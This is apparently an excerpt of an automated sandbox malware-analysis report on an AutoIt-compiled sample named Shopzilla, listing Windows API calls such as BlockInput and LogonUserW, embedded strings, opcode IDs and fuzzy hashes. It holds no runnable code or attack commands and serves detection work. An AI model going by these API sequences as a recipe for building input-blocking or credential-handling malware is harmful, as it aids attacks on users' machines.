                                              • Opcode ID: 8544394a97a395424888bcf312d8a79c6717e1310ef89783cce48d37edca3c39
                                              • Instruction ID: 55db57b5b4de80f47288f5edb9dbb358d6f97ec4d845ce13a0d6d76cb4fe2f14
                                              • Opcode Fuzzy Hash: 8544394a97a395424888bcf312d8a79c6717e1310ef89783cce48d37edca3c39
                                              • Instruction Fuzzy Hash: D2B09232074608ABCA802B91EC19B8C3F68EB45A62F104010F60D45070CB6254508E91
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00C143D4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: 137f9a9cf9cb5e02d9db9e740707b85a2b06001d225775542d70f4476540b8c9
                                              • Instruction ID: 2b50486602ce2db56d1331323b9c6b6ed4b54390b9b136dcb2ccb1df3b51efa0
                                              • Opcode Fuzzy Hash: 137f9a9cf9cb5e02d9db9e740707b85a2b06001d225775542d70f4476540b8c9
                                              • Instruction Fuzzy Hash: 0EE0DF362002049FC310AF6AE801A8BF7E8AF95360F408026FD49C7320CBB0EC508B90
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BF8D8A), ref: 00BF916C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: 93778519ae98431fb8e51e7200d0ae7d2e2bfb179fab46940a490bf9bd885e9f
                                              • Instruction ID: 9335753cba2b6ad178ceb816929a799ab522e6baa727cbf8469736d1657ac35e
                                              • Opcode Fuzzy Hash: 93778519ae98431fb8e51e7200d0ae7d2e2bfb179fab46940a490bf9bd885e9f
                                              • Instruction Fuzzy Hash: 07D05E3326450EABEF018EA4DC01FAE3B69EB04B01F408111FE15C50A0C775D835AB60
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00BE0664
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: 9af572d9ae1c8bf200842bccc7baffd13b940e560fe92a27a9397243c20d93d8
                                              • Instruction ID: 20fa5513bbe45ead0049ca305b84f83ddeeed5728723f9052e21b164df7eece9
                                              • Opcode Fuzzy Hash: 9af572d9ae1c8bf200842bccc7baffd13b940e560fe92a27a9397243c20d93d8
                                              • Instruction Fuzzy Hash: 4DC04CF6815119DBCB05DB90D9D8EFEB7BCAB04305F200056A142F2100D7749B448A71
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BCA28A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 88f31c8992fc835c367e3072c01a48c715443a77b4f0748f76bcadd0c58f9251
                                              • Instruction ID: a3a9b11dffbf3cba7f80a3c4d4c9344218bd804f76291c838311ea86af212f15
                                              • Opcode Fuzzy Hash: 88f31c8992fc835c367e3072c01a48c715443a77b4f0748f76bcadd0c58f9251
                                              • Instruction Fuzzy Hash: 74A0113202020CAB8A002B82EC08A88BFACEA022A0B008020F80C020328B32A8208A80
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00C17D0D
                                              • DeleteObject.GDI32(00000000), ref: 00C17D1F
                                              • DestroyWindow.USER32 ref: 00C17D2D
                                              • GetDesktopWindow.USER32 ref: 00C17D47
                                              • GetWindowRect.USER32(00000000), ref: 00C17D4E
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C17E8F
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C17E9F
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17EE7
                                              • GetClientRect.USER32(00000000,?), ref: 00C17EF3
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C17F2D
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F4F
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F62
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F6D
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F76
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F85
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F8E
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17F95
                                              • GlobalFree.KERNEL32(00000000), ref: 00C17FA0
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C17FB2
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C33C7C,00000000), ref: 00C17FC8
                                              • GlobalFree.KERNEL32(00000000), ref: 00C17FD8
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C17FFE
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C1801D
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C1803F
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C1822C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 8932aa1ec8a181959c49d77943a271f676bd427bb3cb90f2d7e55ca5b3e1a7b8
                                              • Instruction ID: c6488237d0b71e2a8b24eb9c12e4d20806a4d02d16030a054249caccc189e29e
                                              • Opcode Fuzzy Hash: 8932aa1ec8a181959c49d77943a271f676bd427bb3cb90f2d7e55ca5b3e1a7b8
                                              • Instruction Fuzzy Hash: 68027B72910109EFDB14DF64DC99FAE7BB9EF49310F148158F915AB2A1CB70AD41CBA0
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,00C30980), ref: 00C23A2D
                                              • IsWindowVisible.USER32(?), ref: 00C23A51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: 56d56cf9e58df51df31a5ed30710387dbf13c25cf93eca1ea896188ab51f9eda
                                              • Instruction ID: 817e15b0580b49777fd05835b6dd2f83e174b8ebb21b07797bae45abae4b0f30
                                              • Opcode Fuzzy Hash: 56d56cf9e58df51df31a5ed30710387dbf13c25cf93eca1ea896188ab51f9eda
                                              • Instruction Fuzzy Hash: B5D1BD302142509BCB14EF11D452F7EBBE5EF84340F5449A8B8965B6E3CB75EE4ACB82
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00C2AA1D
                                              • GetSysColorBrush.USER32(0000000F), ref: 00C2AA4E
                                              • GetSysColor.USER32(0000000F), ref: 00C2AA5A
                                              • SetBkColor.GDI32(?,000000FF), ref: 00C2AA74
                                              • SelectObject.GDI32(?,00000000), ref: 00C2AA83
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00C2AAAE
                                              • GetSysColor.USER32(00000010), ref: 00C2AAB6
                                              • CreateSolidBrush.GDI32(00000000), ref: 00C2AABD
                                              • FrameRect.USER32(?,?,00000000), ref: 00C2AACC
                                              • DeleteObject.GDI32(00000000), ref: 00C2AAD3
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00C2AB1E
                                              • FillRect.USER32(?,?,00000000), ref: 00C2AB50
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C2AB7B
                                                • Part of subcall function 00C2ACB7: GetSysColor.USER32(00000012), ref: 00C2ACF0
                                                • Part of subcall function 00C2ACB7: SetTextColor.GDI32(?,?), ref: 00C2ACF4
                                                • Part of subcall function 00C2ACB7: GetSysColorBrush.USER32(0000000F), ref: 00C2AD0A
                                                • Part of subcall function 00C2ACB7: GetSysColor.USER32(0000000F), ref: 00C2AD15
                                                • Part of subcall function 00C2ACB7: GetSysColor.USER32(00000011), ref: 00C2AD32
                                                • Part of subcall function 00C2ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C2AD40
                                                • Part of subcall function 00C2ACB7: SelectObject.GDI32(?,00000000), ref: 00C2AD51
                                                • Part of subcall function 00C2ACB7: SetBkColor.GDI32(?,00000000), ref: 00C2AD5A
                                                • Part of subcall function 00C2ACB7: SelectObject.GDI32(?,?), ref: 00C2AD67
                                                • Part of subcall function 00C2ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 00C2AD86
                                                • Part of subcall function 00C2ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C2AD9D
                                                • Part of subcall function 00C2ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 00C2ADB2
                                                • Part of subcall function 00C2ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C2ADDA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 3521893082-0
                                              • Opcode ID: ee6eebc58ae2f2b2057edecf2506901ad139b43c29e4cdc91418b00920a588c3
                                              • Instruction ID: 3b6abdf395626cfe4f9834ba23d1ab8a8dd481f5d095a1843c4bbefed2a9b22f
                                              • Opcode Fuzzy Hash: ee6eebc58ae2f2b2057edecf2506901ad139b43c29e4cdc91418b00920a588c3
                                              • Instruction Fuzzy Hash: 00916872018315AFCB119F64EC18B6FBBA9FF88321F204A19F9A2961A1D771D944CF52
                                              APIs
                                              • DestroyWindow.USER32(?,?,?), ref: 00BA3072
                                              • DeleteObject.GDI32(00000000), ref: 00BA30B8
                                              • DeleteObject.GDI32(00000000), ref: 00BA30C3
                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00BA30CE
                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00BA30D9
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BDC6AC
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BDC6E5
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BDCB0E
                                                • Part of subcall function 00BA1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BA2412,?,00000000,?,?,?,?,00BA1AA7,00000000,?), ref: 00BA1F76
                                              • SendMessageW.USER32(?,00001053), ref: 00BDCB4B
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BDCB62
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BDCB78
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BDCB83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                              • String ID: 0
                                              • API String ID: 464785882-4108050209
                                              • Opcode ID: 5e21ae0bfb903fa3fcd929c2a244553269948969bc44a671b396491135747407
                                              • Instruction ID: dc1934f86ee92b0c4afa0da2fd66aa3403778293f716b627cf68d74296ac7772
                                              • Opcode Fuzzy Hash: 5e21ae0bfb903fa3fcd929c2a244553269948969bc44a671b396491135747407
                                              • Instruction Fuzzy Hash: A3127830604602EFDB25CF24C895BA9BBE5FF09700F2445AAF995CB262D731ED42DB91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 2660009612-1645009161
                                              • Opcode ID: 429ee3ebf20f091f2a16b5b72dc41a9679a56651ddc7ce7838c156891a3efee6
                                              • Instruction ID: cfc775a925c01cb86155d15dda3cdf02499602bec9a368cc41d5a5f19c328de5
                                              • Opcode Fuzzy Hash: 429ee3ebf20f091f2a16b5b72dc41a9679a56651ddc7ce7838c156891a3efee6
                                              • Instruction Fuzzy Hash: 16A16C31A0020ABBCB14AF61DC92EBE77F5EF45B40F1441B9F805AB292EBB19E51D650
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00C1798D
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C17A4C
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C17A8A
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C17A9C
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C17AE2
                                              • GetClientRect.USER32(00000000,?), ref: 00C17AEE
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C17B32
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C17B41
                                              • GetStockObject.GDI32(00000011), ref: 00C17B51
                                              • SelectObject.GDI32(00000000,00000000), ref: 00C17B55
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C17B65
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C17B6E
                                              • DeleteDC.GDI32(00000000), ref: 00C17B77
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C17BA3
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C17BBA
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C17BF5
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C17C09
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C17C1A
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C17C4A
                                              • GetStockObject.GDI32(00000011), ref: 00C17C55
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C17C60
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C17C6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 64a4f4afd2c7634c860ef84644abc43955d735de137afcafb1a3f09da51bb70b
                                              • Instruction ID: 3e49074116be5c69e1a2129600e0c75353a6d1f7ac46de4ab689c81729c24362
                                              • Opcode Fuzzy Hash: 64a4f4afd2c7634c860ef84644abc43955d735de137afcafb1a3f09da51bb70b
                                              • Instruction Fuzzy Hash: E4A19271A10219BFEB24DBA5DC5AFAE7BB9EF45710F104254FA15A72E0C7B0AD00CB60
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00C0B1CE
                                              • GetDriveTypeW.KERNEL32(?,00C32C4C,?,\\.\,00C30980), ref: 00C0B2AB
                                              • SetErrorMode.KERNEL32(00000000,00C32C4C,?,\\.\,00C30980), ref: 00C0B409
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: 5fe275ec8291427c823ed2690ec6d601cdbf9a8dcdb452d68a7056dad66fb1d2
                                              • Instruction ID: bc9cea67ea384bdd3ad5aff55798e7a55b28f88e049de6fb6146f32c8f002d57
                                              • Opcode Fuzzy Hash: 5fe275ec8291427c823ed2690ec6d601cdbf9a8dcdb452d68a7056dad66fb1d2
                                              • Instruction Fuzzy Hash: 3951F238640205EBCF10DB25E9A2DBE73A1EB44701B3040B6F816A72E1DFB19E95EB55
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00C2ACF0
                                              • SetTextColor.GDI32(?,?), ref: 00C2ACF4
                                              • GetSysColorBrush.USER32(0000000F), ref: 00C2AD0A
                                              • GetSysColor.USER32(0000000F), ref: 00C2AD15
                                              • CreateSolidBrush.GDI32(?), ref: 00C2AD1A
                                              • GetSysColor.USER32(00000011), ref: 00C2AD32
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C2AD40
                                              • SelectObject.GDI32(?,00000000), ref: 00C2AD51
                                              • SetBkColor.GDI32(?,00000000), ref: 00C2AD5A
                                              • SelectObject.GDI32(?,?), ref: 00C2AD67
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00C2AD86
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C2AD9D
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00C2ADB2
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C2ADDA
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C2AE01
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00C2AE1F
                                              • DrawFocusRect.USER32(?,?), ref: 00C2AE2A
                                              • GetSysColor.USER32(00000011), ref: 00C2AE38
                                              • SetTextColor.GDI32(?,00000000), ref: 00C2AE40
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C2AE54
                                              • SelectObject.GDI32(?,00C2A9E7), ref: 00C2AE6B
                                              • DeleteObject.GDI32(?), ref: 00C2AE76
                                              • SelectObject.GDI32(?,?), ref: 00C2AE7C
                                              • DeleteObject.GDI32(?), ref: 00C2AE81
                                              • SetTextColor.GDI32(?,?), ref: 00C2AE87
                                              • SetBkColor.GDI32(?,?), ref: 00C2AE91
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: 8538d4ab25c5fb19c52d7af81a9286a1a9bff1d7d07eb3fb33018a3c08b85a14
                                              • Instruction ID: d05a6e24a39ad94b83c1ce26ed16696463ba73fc1070ad5aa73635715bc696b2
                                              • Opcode Fuzzy Hash: 8538d4ab25c5fb19c52d7af81a9286a1a9bff1d7d07eb3fb33018a3c08b85a14
                                              • Instruction Fuzzy Hash: CF514C72910218BFDB119FA4DC48FAEBBB9FF08320F204155F915AB2A1D7719A40DF90
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C28EAE
